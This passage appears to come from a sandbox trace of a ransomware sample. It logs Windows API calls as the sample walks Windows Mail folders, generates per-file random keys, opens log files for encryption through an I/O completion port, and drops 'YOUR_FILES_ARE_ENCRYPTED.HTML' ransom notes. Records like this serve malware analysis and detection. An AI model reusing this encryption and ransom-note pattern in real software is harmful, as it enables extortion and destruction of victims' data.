hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d5fe78, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.693] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="new", cAlternateFileName="")) 
returned 1 [0170.693] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new") returned 68 [0170.693] GetProcessHeap () returned 0x270000 [0170.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0170.693] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new" [0170.693] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*" [0170.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0170.693] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.693] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82c554d6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0170.693] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0170.693] lstrcmpW (lpString1="edb00001.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.693] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0170.693] lstrlenW (lpString=".log") returned 4 [0170.693] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0170.694] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0170.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0170.694] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=2097152) returned 1 [0170.694] GetProcessHeap () returned 0x270000 [0170.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0170.697] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="FF") returned 2 
[0170.697] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="26") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="5B") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="08") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="25") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="DB") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="B3") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="00") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="EC") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="C2") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="60") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="4A") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="4D") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="CB") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="11") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="3B") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="ED") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="77") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="4F") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="4B") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="EA") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="60") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: 
param_1="1F") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="B1") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="DE") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="14") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="C1") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="44") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="9D") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="24") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="EC") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="30") returned 2 [0170.699] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" [0170.699] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.699] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0170.699] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827deb8e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x206000, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0170.699] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0170.699] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.699] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0170.700] lstrlenW (lpString=".MSMessageStore") returned 15 [0170.700] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0170.700] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d13bb7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0170.700] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0170.700] lstrcmpW (lpString1="WindowsMail.pat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.700] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0170.700] lstrlenW (lpString=".pat") returned 4 [0170.702] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0170.702] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d13bb7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0170.702] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0170.702] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0170.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0170.708] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0170.710] CloseHandle (hObject=0x5b0) returned 1 [0170.710] GetProcessHeap () returned 0x270000 [0170.710] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.710] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="new", cAlternateFileName="")) returned 0 [0170.711] FindClose (in: 
hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.711] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0170.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.711] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.713] CloseHandle (hObject=0x604) returned 1 [0170.714] GetProcessHeap () returned 0x270000 [0170.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.714] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb450ab7c, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0170.714] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0170.714] lstrcmpW (lpString1="edb.chk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.714] PathFindExtensionW (pszPath="edb.chk") returned=".chk" 
[0170.714] lstrlenW (lpString=".chk") returned 4 [0170.714] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0170.714] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb71220, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb450ab7c, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb.log", cAlternateFileName="")) returned 1 [0170.715] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0170.715] lstrcmpW (lpString1="edb.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.715] PathFindExtensionW (pszPath="edb.log") returned=".log" [0170.715] lstrlenW (lpString=".log") returned 4 [0170.715] PathFindExtensionW (pszPath="edb.log") returned=".log" [0170.715] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x604 [0170.715] GetFileSizeEx (in: hFile=0x604, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2097152) returned 1 [0170.715] GetProcessHeap () returned 0x270000 [0170.715] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa008 [0170.716] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="FF") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: 
param_1="47") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="18") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="22") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="85") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="47") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="99") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="5D") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="A8") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="8A") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="A1") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="21") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="7E") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="38") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="23") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="A5") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="F2") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="07") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="48") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="B6") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="6A") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="29") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="C3") returned 2 [0170.717] wsprintfW (in: 
param_1=0x4ebd47a, param_2="%02X" | out: param_1="F8") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="96") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="D0") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="61") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="51") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="97") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="A4") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="05") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="44") returned 2 [0170.717] lstrcpyW (in: lpString1=0x75ba0bc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" [0170.717] CreateIoCompletionPort (FileHandle=0x604, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.718] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa008, lpOverlapped=0x75aa008) returned 1 [0170.718] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0170.718] lstrcmpW (lpString1="edb00001.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.718] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0170.718] lstrlenW (lpString=".log") returned 4 [0170.718] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0170.718] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: 
RandomBuffer=0x4ebd4e0) returned 1 [0170.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0170.718] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2097152) returned 1 [0170.718] GetProcessHeap () returned 0x270000 [0170.718] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78c1008 [0170.723] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="23") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="FF") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="22") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="78") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="37") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="9E") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="B9") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="89") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="E1") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="C9") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="4A") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="BD") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="07") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="66") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd456, 
param_2="%02X" | out: param_1="00") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="1D") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="DA") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="67") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="1D") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="57") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="CE") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="91") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="78") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="9E") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="D4") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="BB") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="A1") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="B2") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="B1") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="79") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="CB") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="35") returned 2 [0170.725] lstrcpyW (in: lpString1=0x78d10bc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" [0170.725] CreateIoCompletionPort (FileHandle=0x5b0, 
ExistingCompletionPort=0x3a0, CompletionKey=0x78c1008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.725] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78c1008, lpOverlapped=0x78c1008) returned 1 [0170.725] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcad8ca0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcad8ca0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x81d74b3a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0170.725] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0170.725] lstrcmpW (lpString1="edbres00001.jrs", 